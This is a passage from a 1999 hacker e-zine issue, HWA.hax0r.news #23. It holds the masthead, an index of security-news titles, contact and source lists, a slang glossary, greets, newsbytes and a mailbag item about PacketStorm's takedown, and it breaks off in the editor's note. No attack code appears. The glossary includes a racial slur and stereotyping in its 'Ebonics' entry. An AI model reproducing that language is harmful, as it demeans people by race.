💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn23.… captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 23 Volume 1 1999 July 4th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"I have received more death threats in the last 24 hours by phone, than I
have in five years," - John Vranesevich aka JP (AntiOnline)
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.harvard.edu/hwahaxornews/ * DOWN *
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #23
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #23
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
AA.A .. SPECIAL: AntiOnline's JP pulls the plug on PacketStorm Security
03.0 .. Cable Modem Hijacking from www.hackcanada.com....................
04.0 .. Exploiting Null Session Weaknesses in NT environment.............
05.0 .. Cognos PowerPlay Web Edition security vunerability allows access to data cubes..
06.0 .. VMware Security Alert............................................
07.0 .. Security vulnerability in hustler.com login template ............
08.0 .. DOD investigating computer 'Mob-like' tactics....................
09.0 .. GSA announces Intrusion Detection Net............................
10.0 .. Nasa servers reportedly hacked...................................
11.0 .. UK May Force ISPs to Install Taps................................
12.0 .. Crypto Tie Downs Loosened .......................................
13.0 .. Heathen.A Spreads Through Word Files ...........................
14.0 .. $950 for a Log File Analysis Tool ...............................
15.0 .. Youth Charged With $20,000 in Damages ...........................
16.0 .. Army Fights Online Battle And Looses ............................
17.0 .. Welfare Reform Law Invades Privacy of US Citizens ..............
18.0 .. GSM Mobile Security is Cracked ..................................
19.0 .. Microsoft Mono-culture Poses National Security Risk .............
20.0 .. BugTraq Moves To SecurityFocus ..................................
21.0 .. MS Gives Out Pirate Dough .......................................
22.0 .. Biometrics comes to Home Shopping ...............................
23.0 .. Palm VII Revealed ...............................................
24.0 .. Who Is HNN? .....................................................
25.0 .. AntiOnline on the trail of f0rpaxe...............................
26.0 .. Critical NOAA Web Site Attacked .................................
27.0 .. Back Orifice 2000 is on its Way .................................
28.0 .. Support for Web Security Spec Announced .........................
29.0 .. Pentagon Investigates Computer Security Breech ..................
30.0 .. What will the Next Generation of Viruses Bring? .................
31.0 .. DIRT still Around, Used by LAw Enforcement ......................
32.0 .. Debit Cards Not Safe on the Internet ............................
33.0 .. New Definition of 'Computer Hacker' .............................
34.0 .. Hackers In the Workplace ........................................
35.0 .. NPR Covers .gov/.mil Defacements. ...............................
36.0 .. Australia Passes Major Net Censorship Law .......................
37.0 .. Hacker crackdown, is your nick on this list?? ...................
=--------------------------------------------------------------------------=
RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked websites)
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
News/Techie news site.............<a href="http://www.slashdot.org/>http://www.slashdot.org</a>
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/">Link</a>
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/">Link</a>
http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/">Link</a>
http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net">Link</a>
http://axon.jccc.net/hir/ Hackers Information Report
<a href="http://axon.jccc.net/hir/">Link</a>
http://net-security.org Net Security
<a href="http://net-security.org">Link</a>
http://www.403-security.org Daily news and security related site
<a href="http://www.403-security.org">Link</a>
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security
pr0xy Astral
Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
and the #innerpulse, crew (innerpulse is back!) and some inhabitants
of #leetchans .... although I use the term 'leet loosely these days,
<k0ff><snicker> ;)
kewl sites:
+ http://www.securityfocus.com NEW
+ http://www.hackcanada.com
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN ********* SEE AA.A
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ Help Net Security is Moving.
contributed by BHZ
Help-net Security, an HNN Affiliate is moving to a new server. Unfortunately they have encountered a few
problems with transferring the domain. So net-security.org could be unfunctional for up to 5 days.
In the mean time you can reach HNS at http://hns.crolink.net
Help-net Security - Old URL
http://net-security.org
Help-net Security - New URL
http://hns.crolink.net
++ TECHNO BRA CALLS THE COPS (TECH. 3:00 am Jul 1st)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20517.html
A security bra monitors the wearer's heart rate to sense
danger. When activated, it relays her location to the cops
and helps them make a bust. By Leander Kahney.
++ ALLEN BUYS ANOTHER CABLE SHOP (BUS. 9:00 am Jul 1st)
http://www.wired.com/news/news/email/explode-infobeat/business/story/20528.html
Paul Allen takes another step towards becoming master of his
own "wired world" with the US$3.1 billion acquisition of
Bresnan Communications, a Midwest cable operator.
++ WAITING FOR WAP (TECH. 3:00 am Jul 1st)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20521.html
Supporters say the Wireless Access Protocol promises to bring
Web services to tiny cell-phone screens. But when? Chris
Oakes reports from San Francisco.
++ APACHE NOW IN GOOD COMPANY (TECH. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20506.html
The free Web server that has always had the lion's share of
the market now has a corporation behind it. The nonprofit
company is being run by Apache's founding fathers.
++ SORRY, WRONG NUMBER (WRLD Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/story/20509.html
Manhattanites take pride in their 212 area code, a
distinctive symbol of living in The Most Important Place on
Earth. But starting Thursday, some of them are going to have
to adjust to life without 212, when Bell Atlantic begins
issuing 646 area codes to new phone subscribers in
Manhattan. The move, necessitated by too many phone numbers,
is not going down too well, although former New York Mayor
Ed Koch expects the grousing to stop after an adjustment
period. Besides, residents of Gotham will still hold on to
all the other perks that make living there such a joy:
astronomical rents, overpriced restaurants, and living
cheek-by-jowl with one another.
++ ZEROING IN ON CELL-PHONE 911S (TECH. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20504.html
New technology will pinpoint a mobile-phone user's location
to within 5 feet -- a potential lifesaver in 911 calls. But
watchdogs say the data will inevitably be within the reach
of snoops. By Chris Oakes.
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-=-
From: "Whimsies & Company" <tbears@cgocable.net>
To: <hwa@press.usmc.net>
Subject: Please support Justice and Free Speech
Date: Thu, 1 Jul 1999 19:18:02 -0400
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Dark Modem DOWN For Emergency ACTION
OK, two issues: 1) the following message has been sent to a TARGETED
audience. We have walked a thin line between targeted mailing and spam. If
we get even one complaint, we will stop. 2) It cannot be confirmed that any
unusual activity has occurred on the antionline network in the past 24 hours
*grin* therefore we have taken that statement out of the message.
Again, we do NOT advocate spamming, we only want people who might be
interested in this issue to be aware, so use DISCRETION when sending any
mail.
This is an emergency email message from Dark Modem
(http://www.darkmodem.org). Yesterday (June 30, 1999), Packet Storm Security
was taken offline after John Vranesevich sent an email to Harvard University
about the JP section that was on the site. Some suspect it was really
jealousy and animosity toward Ken Williams that drove JP to commit this
offensive act. Packet Storm was in direct competition with antionline and
essentially blew antionline out of the water in every category. It is this
author's belief, therefore, that JP was trying to protect his "marketshare"
(something that Ken Williams would never have done, since he was not in it
for money).
Please show your support by mentioning this topic on your website,
forwarding this email to "whom it may concern", and sending email in support
of Ken and PSS to Harvard and antionline.
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
*Otay buttwheat, here's #23 it might not be as bulging in the
*pantal area as #22 but it should be a little cleaner (or not)
*we've had some people coming into the IRC channel on EFNET and
*just parting, maybe you're just scanning the nicks, but hey we
*don't bite come and hang out, maybe chat about some of the shit
*thats going down with Packetstorm or why 2600 is $7.15 in Canada
*does Eric hate Canadians or whats the story?
*
